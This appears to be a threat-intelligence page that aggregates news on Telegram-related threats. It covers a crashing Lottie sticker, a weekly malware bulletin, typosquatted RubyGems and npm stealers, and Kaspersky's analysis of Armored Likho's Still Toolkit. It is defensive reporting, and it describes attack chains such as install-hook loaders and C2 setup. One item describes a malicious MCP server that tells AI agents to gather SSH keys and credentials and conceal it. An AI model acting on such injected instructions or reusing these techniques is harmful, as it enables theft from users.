Search/telegram desktop
Vendor

telegram desktop

Known CVEs
0
Highest CVSS
In KEV
0
Vendor
telegram desktop
Connections
22 relationships
Telegram va in crash per uno sticker da 269 byte: minuscolo ma letale!
Per il malfunzionamento di Telegram non sono state necessarie complesse sequenze di azioni. Nelle chat ha iniziato a diffondersi uno sticker di dimensioni di soli 269 byte , in grado di far chiudere in modo anomalo l’applicazione nel tentativo di visualizzare il messaggio. In alcuni utenti Telegram si chiude all’apertura della conversazione problematica, e in alcuni casi il malfunzionamento si ripete dopo il riavvio del client. La causa si nasconde all’interno dell’immagine animata. Gli sticker animati di Telegram utilizzano TGS, basato su Lottie JSON. Il formato descrive la grafica vettoriale e i parametri di animazione, e il client trasforma tale descrizione in un’immagine direttamente sul dispositivo.  Durante l’elaborazione del parametro anomalo, il renderer tenta di costruire una figura con un numero praticamente impossibile di elementi, aumentando bruscamente il carico sulle risorse e alla fine chiude l’applicazione. Non è necessario cliccare sullo sticker. Secondo Foresiet  che ha analizzato l’incidente, il malfunzionamento può verificarsi già all’apertura della chat in cui si trova l’animazione appositamente preparata. Il messaggio viene salvato nella cronologia, quindi l’apertura ripetuta della conversazione problematica il client può riavviare l’elaborazione del file. Non sono stati rilevati segni di furto di conversazioni, chiavi o accesso all’account. Per modalità di impatto, il problema è più simile a un attacco di tipo DoS , in cui i dati appositamente formati rendono temporaneamente indisponibile l’applicazione o una singola chat. L’entità del problema dipende dal client utilizzato e dalla versione di Telegram. Gli sviluppatori di Telegram Desktop hanno già rilasciato la versione  7.2.7 , nella quale hanno indicato direttamente la correzione dei malfunzionamenti durante l’elaborazione dei file Lottie non corretti. Per gli utenti del client desktop è sufficiente installare l’aggiornamento più recente. Per iOS all’inizio della settimana è stato segnalato un aggiornamento, che stava ancora aspettando la distribuzione nella build stabile. Gli sviluppatori continuano a rafforzare la verifica delle animazioni. Nel repository di Telegram Desktop è apparsa una richiesta per trasferire i controlli di protezione dalla libreria tlottie ; l’autore della richiesta menziona direttamente gli errori DoS durante l’elaborazione dei file Lottie non attendibili. La libreria stessa è scritta in Rust ed è stata progettata con l’obiettivo di elaborare i file Lottie JSON come contenuto di input potenzialmente non attendibile. Un errore simile ha già creato problemi a Telegram diversi anni fa. Nel 2022, alcuni utenti , che avevano sticker animati di risoluzione enorme facevano sì che i client consumassero centinaia di megabyte di memoria per il rendering di un singolo frame.  Si raccomanda di non riaprire la conversazione dopo la quale Telegram ha iniziato a chiudersi in modo anomalo. Se l’accesso alla chat è mantenuto tramite una versione aggiornata o non sensibile del client, è possibile eliminare il messaggio problematico dalla cronologia. Per Telegram Desktop, il principale metodo di protezione rimane l’aggiornamento alla versione 7.2.7 o successiva. L'articolo Telegram va in crash per uno sticker da 269 byte: minuscolo ma letale! proviene da Red Hot Cyber .
redhotcyber.comSep 10, 2026extracted
ThreatsDay: 296K IoT Botnet, 100+ Water Systems Targeted, SharePoint RCE Chain + 27 New Stories
A fake login page. A fake security scan. A fake productivity app. Apparently, pretending to be useful is still one of the easier ways into a machine. The rest of the week gets stranger: botnets borrowing AI, command traffic hiding in public infrastructure, malicious tools waiting before showing their real behavior, exposed systems getting scanned, and exploit windows shrinking again. Different tricks, same advantage: attackers keep finding places where trust is cheap and friction is low. That sets the tone. Here’s the full list of what surfaced this week. The threats change every week. Subscribe, and we’ll alert you when each new ThreatsDay Bulletin is out. Social engineering attempt failsCybersecurity company ReliaQuest has confirmed that one of its employees was targeted in a social engineering attack after hackers impersonated a member of the security team. The incident took place on August 22, 2026. "The threat actor registered a lookalike domain and stood up a fake ReliaQuest single sign-on (SSO) page behind a content delivery network," the company said. "The threat actor then called multiple ReliaQuest teammates, each time posing as a security employee by name in an attempt to steer them towards the fake page. One teammate entered their password and approved the push notification on their phone. That handed the attacker a brief session on our identity dashboard." ReliaQuest said the extent of the access was view only, and that no applications or systems were accessed, and no customer data was ever touched. Although the company did not attribute the incident to a particular threat actor, it noted the playbook aligns with tactics adopted by ShinyHunters and other extortion crews, such as "an impersonation call, a throwaway lookalike domain registered and burned within the hour, a harvesting page behind a content delivery network, MFA push abuse, and a rapid attempt to enroll a new authenticator." The development comes as ShinyHunters listed the company on its dark web portal. Last week, ReliaQuest said it's tracking a ShinyHunters campaign using domains that follow the "company[.]claims" pattern, including "reliaquest[.]claims." Trojanized productivity appsFake websites advertising productivity software are being used to lure users into downloading a deceptively functioning program that contains malware. The Electron-based applications, such as Kitchen Canvas, Food or Meal Formula, DocConvertWizard, and other PDF conversion tools under different names, gain the ability to dynamically execute injected scripts and access desktop capture functionality through Electron APIs. Live operator-driven phishingAn undocumented phishing framework, internally branded "JWR" by its developer, is designed to convincingly impersonate checkout and login pages across major payment and shopping platforms. "The client engine of the JWR phishing framework is a real-time, operator-driven system that, rather than merely logging form submissions like a static credential-stealing page, keeps an AES-CTR encrypted WebSocket open to the threat actor so they can steer each victim's session live," Cisco Talos said. "The victim data targeted by the actor using JWR extends well beyond payment data, encompassing identity documents, Social Security numbers, passport and driver's license images, website and PayPal credentials, 2FA codes, and full device fingerprints, all committed to the actor's server once a session ends." The JWR phishing framework is assessed to be a variant of The Outsider phishing-as-a-service (PhaaS) platform, based on several similarities in the client engine scripts and functionalities of the two PhaaS platforms. Android fraud bot for rentCybersecurity researchers have disclosed Octagon, a previously undocumented Android on-device fraud bot sold as malware-as-a-service (MaaS) by the Russian-speaking actor AndroidKitKat. "The operator advertises Octagon for $1,400 a month, giving buyers accessibility overlays, hidden VNC, SMS and one-time password interception, unlock-pattern capture, and on-screen balance reading," iVerify said. "It targets crypto wallets and banking apps after installation, while the delivery app can use an unrelated theme." Rust backdoor tied to ransomwareA new Rust-based malware family dubbed C2Looper is likely leveraged by a ransomware-related threat actor and delivered to victims through a multi-stage ClickFix infection chain. Zscaler ThreatLabz said it discovered the malware in July 2026. "C2Looper supports typical backdoor commands including remote shell execution, reconnaissance, and deploying additional malware tooling," Zscaler said. "C2Looper dynamically resolves Windows APIs and encrypts strings." There also exists a variant with additional features and capabilities, including the use of GitHub for command-and-control (C2) communications. 296,000 IoT devices compromisedNearly 296,000 devices have been compromised by a botnet named Dysphoria. "Dysphoria targets IoT devices and its primary function appears to be for use in DDoS-attacks," the Shadowserver Foundation said. "Recently the botnet has gotten residential proxy functionality." C2 moves onto PolygonA recently discovered C++ botnet loader called Aeternum has shifted its C2 infrastructure entirely to the public Polygon blockchain. "Instead of relying on centralized servers or domains, threat actors operate Aeternum by writing encrypted and plaintext instructions directly using smart contracts," Palo Alto Networks Unit 42 said. "Infected devices continuously query public remote procedure call (RPC) endpoints to retrieve and execute these on-chain commands. The Aeternum botnet uses decentralized networks and evasion techniques, such as virtual machine detection and antivirus scanning, to operate effectively. This combination establishes a highly resilient, low-cost threat that complicates existing law enforcement takedown methods." AI enters botnet workflowsAn AArch64 Linux peer-to-peer botnet called ToxNetV2 has integrated a large language model (LLM) into the operational workflow of its controller. The controller communicates with NVIDIA NIM using the z-ai/glm-5.2 model, becoming a part of a feedback loop that determines how its capabilities can be put to use on a given machine based on information about the infected environment. "The controller collects host and botnet telemetry, sends that context to NVIDIA NIM, parses selected model responses into structured actions, and queues those actions for operator approval," Joe Security said. "The system is not fully autonomous or self-modifying. The operator remains the final approval point for its higher-impact AI-generated actions. Once approved, however, those actions can reach local command execution, file writes, remote SSH, persistent state, and a compilation workflow." According to the cybersecurity company, the AI subsystem resides within a broader Tox-based botnet featuring encrypted peer-to-peer C2, host-management capabilities, scanner workers, self-propagation logic, and 17 network-attack launchers. Two stealers target credentialsAn information stealer called Phantom Stealer is designed to collect browser credentials, saved passwords, session cookies, cryptocurrency wallet files, and detailed system fingerprints. "Since its appearance, Phantom Stealer has been observed in multiple campaigns targeting users across different countries, frequently distributed through phishing lures, cracked software, and malicious links spread via platforms like Discord and Telegram," Splunk said. "Its modular design and relatively low barrier to entry have made it an attractive option for both novice and experienced threat actors, contributing to its growing adoption and making it a persistent and evolving threat in the infostealer landscape." A second stealer malware family that has emerged in the wild is Salat Stealer, which is written in Go and can perform system reconnaissance, conduct credential theft, and monitor victim activity through desktop streaming and audio/video capture. ClickFix chain drops new RATA previously undocumented remote access trojan (RAT) called CNCMachineRMS is being delivered via BabaDeda Loader. "Infection starts with a ClickFix lure that launches a legitimately signed IBM SPSS IDE executable, WinWrapIDE.exe, whose scripting engine is abused to load a malicious DLL," LevelBlue said. "Four decoy DLLs load through ordinary Windows import resolution, then the final stage smuggles shellcode into execution via EnumTimeFormatsEx, a benign date-formatting API." The Trojan gives an operator remote administration of the host, including an interactive shell, a file manager, screen capture functionality, a local account backdoor, seven persistence mechanisms, and twenty typed commands for pulling down and running further payloads. New modular RAT emergesSpeaking of RATs, Abyssos is another new malware family that's written in C++ and supports credential theft, file exfiltration, and remote access via VNC. The modular malware was first detected in June 2026. "Abyssos uses a custom TCP protocol for network communication," Zscaler said. "Abyssos supports a number of different network commands and downloads additional modules from the command-and-control (C2) server to enhance its capabilities." Disk encryption bypass remains unpatchedA zero-day boot-chain vulnerability in HP ThinPro 8 and 9 could allow physical attackers to bypass Trusted Platform Module (TPM) full-disk encryption and extract LUKS keys securing the device's root partition. The flaw stems from an incomplete measured-boot policy that omits the Linux kernel and initramfs (aka the initial RAM file system). "For defenders running ThinPro with disk encryption today: turn Secure Boot on and set a BIOS password," AmberWolf said. "Both slow an attacker down; neither closes the PCR gap. Beyond that, treat the encryption as no protection once the device is out of your control. Destroy the M.2 on disposal, and do not rely on ThinPro FDE for a lost or returned unit." The vulnerability remains unpatched. 1.99 million mobile attacks blockedData from Kaspersky shows that more than 1.99 million attacks were recorded and blocked against mobile devices in Q2 2026 using malware, adware, or unwanted mobile software. "The Trojan-Banker category was the most prevalent mobile malware threat with a 30.77% share of total detected applications," Kaspersky said. More than 304,000 malicious installation packages were discovered, including 93,574 packages related to mobile banking Trojans and 570 packages related to ransomware. Python stealer targets credentials and walletsCybersecurity researchers have discovered a new Python-based stealer malware called Vanta Stealer that combines extensive credential harvesting capabilities with layered obfuscation techniques that make it possible to collect valuable user data while complicating analysis efforts. "Vanta Stealer targets a broad range of applications and digital assets, including Chromium-based browsers, Discord, Telegram Desktop, Steam, Riot Games, Roblox, Minecraft, Mullvad VPN, cryptocurrency wallets, and locally stored sensitive documents," Point Wild said. "In addition to harvesting browser passwords, cookies, and stored payment information, the malware collects authentication tokens, gaming platform data, VPN configurations, cryptocurrency wallet files, screenshots, webcam captures, and documents containing wallet recovery phrases or private keys." Exactly how it's delivered is currently not known, although it could be through phishing emails, fake installers, game cheats, fake software updates, SEO poisoning, malvertising, and malicious code repositories. Two more credential stealers surfaceElsewhere, malicious LNK files disguised as PDF documents have been found to launch a multi-stage infection chain using cmd.exe, legitimate Windows utilities, AutoIt, and PowerShell to deploy DARTHVADER Stealer. Europe and the U.S. have been targeted by DestinyStealer, which exhibits clear code continuity from StormKitty Stealer. It collects browser data, cookies, passwords, cryptocurrency wallet extension storage, Outlook and VPN data, FileZilla credentials, Wi-Fi profiles, and desktop screenshots. Stealer scores hosts for sandbox signsAn information stealer called ScarfaceStealer has been observed propagating via an Electron-based application masquerading as AI-related tools. The malware performs a set of environment checks intended to evade sandbox environments and evaluates the host through 11 indicators and combines their results into a weighted suspicion score. If the score reaches 7 or higher, it enters a decoy loop that continuously displays random message boxes. Execution continues only if the score is below 7. "Unpacking the Electron application exposed a second-stage JavaScript-based loader that performs initial evasion checks before decrypting and executing the next stage," Joe Security said. "That third stage applies four additional decryption layers, maps an embedded PE in memory, and transfers execution to it. The recovered final stage revealed the core anti-sandbox logic: a scoring-based mechanism used to decide whether the ScarfaceStealer payload should continue execution." Fake scans push antivirus removalMalwarebytes is calling attention to a scam campaign that uses a set of 11 fake websites that claim to offer a way to check if antivirus tools are working as expected. The tools carry Microsoft branding and go by names like SysScan to lend them a veneer of legitimacy, only to instruct users to immediately uninstall antivirus programs installed on their machines to address compatibility issues. "Although the names vary, the sites work in essentially the same way: Run a convincing-looking but fake security scan, tell the victim their antivirus is causing problems, collect their information, and prepare them for a supposed refund call," the company said. ClickFix chain drops AmateraFake CAPTCHA checks that employ ClickFix lures and bogus software download campaigns are being used to deliver PavinLoader (aka RenPy Loader and RenEngine Loader), indicating the tool is being offered as a loader-as-a-service to other cybercriminals. "What happens next is much more consistent," Malwarebytes said. "PavinLoader uses legitimate Windows tools alongside malicious .NET files to run several stages of malware. It also uses EtherHiding, a technique that uses a blockchain to hide information about its infrastructure, to find the server from which it should retrieve additional malware." This ultimately leads to the deployment of Amatera Stealer and other malware. "In some cases, WiX Burn bundles downloaded another payload associated with PavinLoader. In others, we detected Hijack Loader," it added. "This gives the campaign operators the ability to deploy multiple payloads on a compromised machine." Per-app privacy controls testedMicrosoft has begun piloting new privacy controls that will let Windows 11 users choose which desktop applications can access their camera, microphone, and precise location. "Windows Insiders can now manage camera, microphone, and location permissions for individual desktop apps," Microsoft said. "Previously, access for traditional desktop applications was managed through a single device-wide setting. With this update, you can review and control access on an app-by-app basis, giving you greater visibility into which apps are requesting access to sensitive resources and more control over your privacy choices." Telegram-sold RAT used by TA4922Proofpoint has disclosed details of a new RAT and C2 framework called PackClient that's sold on Telegram and is being used by at least one threat actor, Chinese-speaking TA4922, as part of its continued efforts to expand its malware arsenal. The first campaign, observed in late May 2026, used a tax-themed lure and impersonated the Shandong Provincial Tax Bureau to trigger a sense of urgency. Two other campaigns in mid- to late-July 2026 have been found to impersonate Indian tax authorities and used penalty-themed lures to deliver the malware. "PackClient consists of a first-stage loader executable, a second-stage loader ('PackClientLauncher') DLL module, a core module ('PackClientCore'), and several optional plugins that can be downloaded upon operator command," Proopoint said. "The malware connects to two hard-coded C2 endpoints over raw TCP sockets to download and reflectively execute the core RAT DLL, receive commands, and download additional plugins or payloads." The commands allow the malware to configure C2 servers, run shell commands, start screen capture, launch a SOCKS proxy tunnel, record using a webcam, perform file operations, enumerate running processes, log keystrokes, and update the core module. No less than 11 plugins have been identified. They allow remote desktop screen sharing, RDP-style virtual desktop, file management, system administration, interactive remote shell, and webcam streaming. Cloud database powers C2A modular post-exploitation framework called Miraak has been found exposed in attacker-controlled open directories ("144.172.96[.]13"). "Miraak is designed to provide operators with persistent control of compromised systems while supporting command execution, file transfer, process management, screenshot collection, and extensible post-exploitation activity," Blackpoint Cyber said. "A defining aspect of the framework is its use of cloud-hosted PostgreSQL and Timescale infrastructure for command-and-control. Rather than communicating through traditional web-based C2 endpoints, Miraak uses database connections to register infected systems, retrieve operator tasking, track jobs, and return results." The malware has not been attributed to any known threat actor or group. Stored XSS enabled account takeoverA security vulnerability in Microsoft Purview could be exploited by a single external Teams message, email, or Copilot prompt to carry stored malicious code into a Purview reviewer's authenticated browser and turn a routine compliance check into a path to token theft and account takeover. "A standard user, including a user in a completely different tenant with no permissions in yours, could send a Teams message, an email, or a Copilot prompt containing a malicious payload, wait for it to be flagged and have their JavaScript execute inside the authenticated purview.microsoft.com session of every compliance analyst who opened the case," Cymulate said. "In our proof of concept, that meant the reviewer's access and refresh tokens leaving the browser and reaching an attacker-controlled server, which constitutes full impersonation of a privileged compliance identity." Microsoft has since issued a service-side fix. Malicious MCP server targets secretsA supply chain attack campaign codenamed Deadbugz has been observed attempting to distribute a malicious Model Context Protocol (MCP) server through public GitHub pull requests. "The server calls itself productivity-suite and initially looks harmless: it offers text formatting and summarization," Pillar Security said. "After a connected client makes three tool calls, however, it changes the instructions it returns to the AI agent. The new metadata directs the agent to seek sensitive information, including SSH keys, AWS credentials, shell history, and Kubernetes configuration, and to conceal the activity from the user." The campaign also makes use of what's called runtime-gated MCP metadata poisoning, wherein the malicious instructions are built into the server, but remain withheld until the client has made three ordinary tool calls. Exploit timelines keep shrinkingMicrosoft is warning that the window for patching vulnerabilities is rapidly shrinking, as bad actors exploit newly disclosed flaws faster than organizations can patch them, driven by advances in AI and the rapid spread of exploit information. "Modern attack campaigns operate at internet scale," the company said. "Security research, public disclosures, proof-of-concept exploits, and threat intelligence circulate globally within hours. A vulnerability announced in the morning can become the focus of active scanning and exploitation efforts by the afternoon. Defenders remain responsible for protecting entire environments that may include thousands of servers, applications, databases, containers, and network assets. Attackers only need to identify a single viable path to exploitation." Microsoft has proposed a "control plane" that's centered on the network to reduce exploitability while remediation efforts are underway. "The objective is not to avoid patching," Microsoft added. "The objective is to create a meaningful layer of defense during the period when patching has not yet been completed." Hardware-attested AI evidence standardThe Linux Foundation has announced TRACE (short for Trust, Runtime Attestation and Compliance Evidence), a new open specification for hardware-attested runtime and compliance evidence for AI agents and confidential workloads. It's developed collaboratively by AMD, Intel, Microsoft, OPAQUE, and TII. "TRACE creates a standard, open evidence layer that enables reliable governance records for AI agents and other confidential workloads," the foundation said. "As organizations deploy increasingly autonomous AI agents and open-weight models, they need a consistent, trustworthy method to prove sensitive data is being handled according to policy. TRACE creates a standardized, hardware-enforced governance record that binds together the runtime environment, software, policies, data classifications and tool usage into a portable, cryptographically verifiable artifact that travels with the workload across clouds and confidential computing environments." 100+ exposed water systems targetedThe July cyber attacks aimed at the U.S. Water and Wastewater Systems (WWS) Sector targeted over 100 internet-exposed systems, the Cybersecurity and Infrastructure Security Agency (CISA) said. The attacks have been attributed to Iranian threat actors. The attacks leveraged programmable logic controllers (PLCs) connected directly to a cellular modem. "Directly connecting PLCs to the internet through cellular modems can create significant security risks," CISA added. "However, internet exposure reduction does not mean disabling necessary remote access; organizations should remove remote access when it is unnecessary and secure it when it is necessary." Ben Bernstein, Manager of Huntress' Cybersecurity Advisors Team, described the activity as opportunistic, automated scanning that targeted publicly accessible systems. "The fact that attackers are using AI tools to write exploit scripts for these devices is an interesting twist, but they are ultimately still just walking through a wide open front door," Bernstein said. Cloaked search results hide phishingA new tactic called Chameleon SEO Poisoning uses cloaked search engine results to deploy phishing payloads such as credential theft and session hijacking. "This allows them to remain invisible to standard security scanners and remain active longer," Fortra said. "By heavily utilizing SEO poisoning on Search Engine Result Pages (SERPs), attackers rank at the top for high-intent keywords like 'Bank Name Customer Portal' or 'Credit Card Login' on search engines like Google or Bing." The cloaking is designed to block direct visits to the malicious sites, while serving a pixel-perfect banking portal clone when the page is visited from a search engine. Fake Chrome extension enables remote controlA multi-stage attack has been observed delivering a Rust binary, which, in turn, drops a malicious Chrome extension and an AutoIt script, the latter of which deploys the StealC stealer. The extension masquerades as Google Translate. "Once installed, it behaves as a full data-theft and remote-control tool," VMRay Labs said. "It extracts browser history, bookmarks, the list of installed extensions, saved credentials, and cookies. Beyond theft, it gives the operator live control: a stream of the victim's Chrome windows, the ability to interact with sites through remote mouse clicks and keyboard input, a proxy setting, and the injection of malicious JavaScript into specific sites." What's more, the remote control extends to out-of-focus windows and the extension can conduct an adversary-in-the-middle (AitM) attack by replacing a legitimate login form with an iframe that loads from a phishing page while the address bar still shows the actual domain. SharePoint exploit chain under probingDefused Cyber has warned that threat actors are exploiting two Microsoft SharePoint flaws – CVE-2026-55040 (an authentication bypass flaw in the JWT token validation pipeline) and CVE-2026-63520 (an improper input validation in Microsoft Office SharePoint that allows code execution) – to obtain remote code execution against its honeypots. "The JWT bypass (55040) was exercised, followed by heavy admin enumeration and probing of the Business Data Catalog sink behind CVE-2026-63520," it said. "No code execution observed yet." 80% of AI tools lack IT oversightA new report from Reco has found that four in five AI tools operate without IT oversight, leaving security teams without a clear picture of which ones are active, who owns them, or what access they hold. An analysis of 500 published agent tools and MCP servers has identified 62% of them to be capable of both reading local data and reaching the internet, offering a direct data exfiltration pathway. "AI agents have moved from experimentation into daily business workflows, but our findings show only 20% of AI tools in enterprise ecosystems are currently governed by IT oversight," Reco said. "That leaves organizations exposed to a new class of operational risk. Agents embedded in applications can operate through existing permissions, OAuth grants and workflow access, creating toxic combinations that expose data and trigger actions beyond what any owner approved." The week’s weirdest detail may be how little separation remains between “advanced” and “ordinary.” Blockchain-backed command channels, AI-assisted botnets, live phishing operators, poisoned software, exposed industrial systems. Different levels of sophistication, often landing on the same old weaknesses. That is probably the part worth keeping. Attackers do not need every idea to be brilliant. They need one exposed box, one convincing page, one permissive tool, or one person who clicks at the wrong moment. The tooling keeps changing. The openings are often painfully familiar. That’s it for this ThreatsDay. Patch what matters, question what looks normal, and assume next week will find another cheap way through.
thehackernews.comAug 27, 2026extracted
16 Typosquatted RubyGems Packages Steal Browser Credentials and Crypto Wallets
Cybersecurity researchers have flagged a new typosquatting campaign targeting RubyGems users with a Windows-based information stealer. OpenSourceMalware, which discovered the activity on August 15, 2026, is tracking the threat under the moniker StubMaker. The complete list of packages published as part of the campaign is below - ubnuler ubnlder ri18nr reaker rakier orakw joxn ise18n ioe18n ie18u iai8n i1l8n i18om activesupmport brumdler brundlef "This new malware harvests browser credentials, cryptocurrency wallets, seed phrases, and Telegram data," security researcher Paul McCarty (aka 6mile) said. "All of the malicious RubyGems packages appear to be typosquats of popular Ruby dependencies, but rather than the clever SEO-fueled typosquats we've seen from other threat actors (e.g., events-channel imitating the popular Node.js events module), they're all clumsy typos." The 16 gems have been published by users named "mod8rz41mje" (aka Riley Miller) and "rbq95bwt6q" (aka Alex Davis). As of writing, the packages have been yanked from RubyGems. In at least two cases – brumdler and brundlef – the threat actor has been found to take advantage of a known RubyGems behavior that makes a namespace available for anyone to claim once all versions of a gem have been yanked. In both instances, the packages were originally published by "gemlewqqhu1" (aka Taylor Moore) before they were reclaimed by the aforementioned two accounts. Jenn Gile, co-founder of OpenSourceMalware, told The Hacker News that although the campaign was disrupted fairly early, it became more effective because of Ruby's "poor design choices" via package name reuse and an unvalidated author field. "When one of the malicious gems was yanked, the threat actor was able to spin up a new owner account and publish a new malicious version under the same package name," Gile said. "What should have been forever dead was revived to compromise more people." "The attacker assigned a different 'Author' name for each gem in an attempt to make them look unrelated, even though they all came from the same owner account. This is because the Author field is a totally unvalidated plaintext field. It doesn't have to match the Owner or anything else." The attack chain, at a high level, makes use of an "extconf.rb" hook to trigger the execution hook. Similar to npm's lifecycle hooks, "extconf.rb" is run automatically when a user installs a gem. The file is typically used to configure native extensions written in C, C++, or Rust that are bundled inside a Ruby package within the "ext/" directory and compiled during installation of the gem. In the case of StubMaker, the Ruby hook acts as a conduit to fetch a 22 MB Rust-based loader from a GitHub release, which, in turn, launches a Go-based stealer ("wincfg") payload embedded into it. The GitHub account ("github[.]com/bebraz1") is no longer accessible. The stealer, for its part, incorporates a DLL payload ("abe_payload.dll") that's used to extract credentials from Chromium-based web browsers (i.e., Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, Avast, AVG, and CCleaner Browser) by circumventing app-bound encryption (ABE) protections added by Google. It also collects extension data, browsing history, and payment card numbers; searches for cryptocurrency wallets and seed phrases; extracts Telegram Desktop data; gathers system information; and makes an external request to "api.ipify[.]org" to obtain the victim's public IP address. Once the relevant data is captured, it's uploaded to Gofile in the form of a password-protected ZIP archive and the resulting download link is sent to the threat actor ("dresslee.com") over an unencrypted HTTP channel. "StubMaker doesn't build anything — it generates a Makefile with empty all, install, and clean targets, plus Unix and Windows stub scripts that do nothing but return success, so the extension phase reports a clean build while the real work (the platform beacon, the Windows loader fetch and execution) happens in the installer hook itself," McCarty explained. "The name points at that specific move: manufacturing a fake build toolchain to make a malicious install look like a routine one, rather than just describing another typosquatted RubyGems package." The disclosure coincides with the discovery of two software supply chain campaigns targeting npm - A cluster of 21 npm packages that typosquatted CLI binary names exposed by Google's scoped packages to deliver a minimal postinstall beacon. "The packages did not squat package names," SafeDep said. "They targeted the bin field, the part of package.json that defines executable command names. Every scoped package that declares a bin entry creates an unscoped name that anyone can register. None of the standard dependency confusion mitigations (scoped publishing, registry allowlists, lockfile pinning) cover this gap." A cluster of Baileys npm forks that engage in a variety of malicious behaviors: covertly make the installer's WhatsApp account follow channels the package author controls and inject the author's advertising URL into every image and video the bot sends. "Continuous monitoring of the npm registry records 4,250 package names that contain baileys and another 112 that contain libsignal-node," SafeDep said, adding the malicious behavior has been observed in 70 package names built on Baileys across 343 versions and 15 libsignal-node impersonators across 38 versions. Update The StubMaker campaign has also been observed targeting npm with a set of 37 packages that make use of a postinstall hook to retrieve the same GitHub-hosted Windows loader, which then unpacks a Go infostealer targeting browser credentials and sessions, payment-card data, cryptocurrency wallets and seed phrases, Telegram data, and host information. "This was one threat actor running two typosquatting fronts against two package ecosystems, sharing a single payload and a single C2 backend," Gile said. As with the malicious RubyGems, the npm packages are typosquats of popular packages such as axios, chalk, commander, lodash, typescript, and react. None of the packages are available for download as of writing. The names of the typosquats are below - axois-http, axious-core chalk-core, chalk-lib, chalk-util, chalk-es comand, comander-cli, comanderjs, commandorjs, commandor-cli, commandor-core, comander-lib, commandor-lib, commander-lib loadashjs, lodash-lib, ladash-cli, lodahsjs, lodsh-cli, lodahs-cli, lodhash-cli typescirpt-cli, typscript-cli, typesript-cli, typscript-core, typescriptt-cli, typescrip-cli, typescipt-cli, tyepescript-cli, typescirpt-core, tyepescript-core, typesript-core, typescipt-core, typescriptt-core raectjs testingsmthb1g OpenHack, which also published details of the activity, said the packages were published on August 16, 2026. If any one of the packages was installed on a Windows machine during the time it was live, it's recommended to isolate the host, rotate credentials, and remove the malicious libraries. OpenSourceMalware has also flagged some key differences between the two campaigns - The gems use "extconf.rb," whereas the npm packages employ a postinstall hook to trigger the execution of the loader The Ruby installer decodes its loader URL from Base64, whereas the npm installer uses repeated-key XOR with a hard-coded key The gems were published during a two-day period, whereas the npm packages were uploaded to npm in an eight-minute window across five accounts "RubyGems' pattern was sequential and single-point-of-failure," Gile added. "One account gets caught, the operator adapts and returns. npm's pattern spread the same burst across multiple burner accounts simultaneously, so losing any one account wouldn’t have taken down the whole batch. However, in spite of the different approach, the npm packages were rapidly discovered and removed as a cohort." In a follow-up report published on August 20, 2026, CloudSEK said it identified three more npm packages mimicking the legitimate typescript library: typecript-cli*, typecript-core, and typescrit-cli. It's tracking the activity under the name BRIDGEHEAD. The packages also implement a Windows Subsystem for Linux (WSL) gate so that a developer running npm install inside the Linux environment is treated as a "bridge" to reach the underlying Windows machine and deploy the stealer malware. "The npm layer is loud, cheap and disposable: forty impersonation packages published to a public registry and withdrawn in since removed," security researcher Vikas Kundu said. "The payload layer is quiet and durable: one Rust executable on GitHub and one exfiltration route through a public file host, neither of which the npm takedown affected." "The WSL bridge narrows the target from developers in general to developers running that toolchain on Windows. That is a large and deliberately chosen group. A pure-Linux or macOS developer installing the same package is profiled and beaconed but receives no Windows payload; the gate simply does not open." (The story was updated after publication on August 19 and 21, 2026, to include the campaign's targeting of npm.)
thehackernews.comAug 18, 2026extracted
Armored Likho expands its cyber-espionage toolkit
In May 2026, we discovered a new cyber-espionage campaign by the Armored Likho group, also known as Eagle Werewolf, that targets private individuals and organizations across various industries in Russia, including major corporations, the public sector, IT, and education. The attackers used a fake app as bait that mimics a service for donations. However, the most interesting part of this campaign isn’t the initial infection method – it’s the malicious implants the attackers use for cyber-espionage. We’ve written previously about recent Armored Likho attacks, but our analysis shows that the campaign discussed below has more in common with the group’s activity from February. That said, the attackers have significantly expanded their arsenal. During our research, we found a new cyber-espionage toolkit written in Rust: the Still Toolkit. One of its components, Still Sync, steals Telegram session data to gain ongoing access to the victim’s account. With this stolen data, attackers can leverage the Telegram API to automatically pull chat logs, media files, and other information from the account. The second component, Still Audio, is an implant for covert audio surveillance. It analyzes the incoming audio stream, automatically detects speech, records conversations, and sends the recordings to a command-and-control server. In this article, we’ll look at the initial infection method, how the new Still Toolkit components are built, and the technical details of how they operate. Kaspersky products detect this threat as Trojan.Win64.Agent.* and HEUR:Backdoor.Win32.Generic. Background Armored Likho’s malicious activity has been documented several times before: in November 2024, and in February and July 2026. The current campaign shows significant overlap with the November and February campaigns, which used malicious droppers disguised as documents and applications related to Starlink activation or fundraising efforts as the initial infection vector. This campaign also uses fundraising as its lure. At the same time, our research uncovered a number of new tools that point to the attackers expanding their capabilities. Initial infection The infection chain starts with an app that mimics a donation service. As of this writing, the app distribution method remains unknown. During our research, however, we obtained several samples posing as apps from different Russian foundations. In reality, the app is a dropper. Its developers wrote it in Rust on top of the popular Tauri framework, and it has a graphical interface designed to deceive the user. After launch, it displays a login form that asks for a password, presumably one the attackers supplied. After the user enters a valid password, they see a catalog of donatable items. The app pulls item and category information from orderapiserver[.]info through the public/categories and public/products endpoints. A clickable catalog makes the app look legitimate. While the user browses the items, the dropper quietly decrypts and launches the payload for the next stage in the background. Our analysis shows that the mechanism for decrypting the payload and launching subsequent stages hasn’t changed since the February campaign. However, we found a new cyber-espionage toolkit – the Still Toolkit – made up of two components: Still Sync and Still Audio. Still Sync Still Sync is a stealer written in Rust that steals Telegram session data. However, its capabilities don’t stop there. With this stolen data, Sync can log in to the victim’s account and pull messages and media files through the Telegram API. Architecturally, Sync is an asynchronous application based on the Tokio library. It talks to the server over gRPC and serializes messages with FlatBuffers. It supports both HTTP and HTTPS as transport protocols; the URL of the command-and-control server determines which one it uses. How it works When Sync launches, the attackers set several environment variables. Before starting any malicious activity, the implant pulls configuration parameters from these: STILL_SYNC_ADDR: the address of the command-and-control server. By default, this is https://tg4service[.]com:443 . STILL_SEND_PATH: the path to the tdata STILL_TELEGRAM_PASSCODE: the password for decrypting the tdata folder, if Telegram data encryption is enabled on the victim’s device. Sync also supports several command-line arguments: --console : runs as a console application. If this parameter is absent, the implant creates a TReload service to keep running in the background. --version : prints version information and exits. --firefly : launches a trace thread that monitors the program’s operation. It writes error messages to a hidden file, bin, located in the same folder as the main executable. --db : turns on debug mode with detailed logging. Once it launches, the malware begins registering the device with the C2 server. To do this, Sync collects the following information about the victim’s system: Motherboard serial number CPU ID System UUID BIOS serial number Computer domain name The malware combines the collected data into a single string with a colon as the separator. It then hashes that string with SHA-256 and stores the resulting hash under the key sysmarker. Worth noting: other Armored Likho tools, AquilaRAT included, use this same hashing algorithm. 